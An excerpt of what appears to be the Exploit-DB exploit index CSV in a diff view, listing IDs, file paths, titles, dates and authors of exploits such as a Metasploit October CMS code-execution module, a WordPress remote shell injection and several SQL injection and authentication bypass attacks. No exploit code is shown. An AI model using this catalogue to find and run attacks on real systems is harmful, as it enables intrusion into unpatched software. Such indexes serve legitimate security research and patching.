47376,exploits/php/remote/47376.rb,"October CMS - Upload Protection Bypass Code Execution (Metasploit)",2019-09-10,Metasploit,remote,php,
47390,exploits/hardware/remote/47390.txt,"Inteno IOPSYS Gateway - Improper Access Restrictions",2019-09-16,"Gerard Fuguet",remote,hardware,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -41734,3 +41738,5 @@ id,file,description,date,author,type,platform,port
47386,exploits/php/webapps/47386.txt,"LimeSurvey 3.17.13 - Cross-Site Scripting",2019-09-13,"SEC Consult",webapps,php,80
47387,exploits/php/webapps/47387.txt,"Ticket-Booking 1.4 - Authentication Bypass",2019-09-14,cakes,webapps,php,
47388,exploits/php/webapps/47388.txt,"College-Management-System 1.2 - Authentication Bypass",2019-09-14,cakes,webapps,php,
47392,exploits/cfm/webapps/47392.txt,"Symantec Advanced Secure Gateway (ASG) / ProxySG - Unrestricted File Upload",2019-09-16,"Pankaj Kumar Thakur",webapps,cfm,
47395,exploits/php/webapps/47395.txt,"CollegeManagementSystem-CMS 1.3 - 'batch' SQL Injection",2019-09-16,cakes,webapps,php,

Can't render this file because it is too large.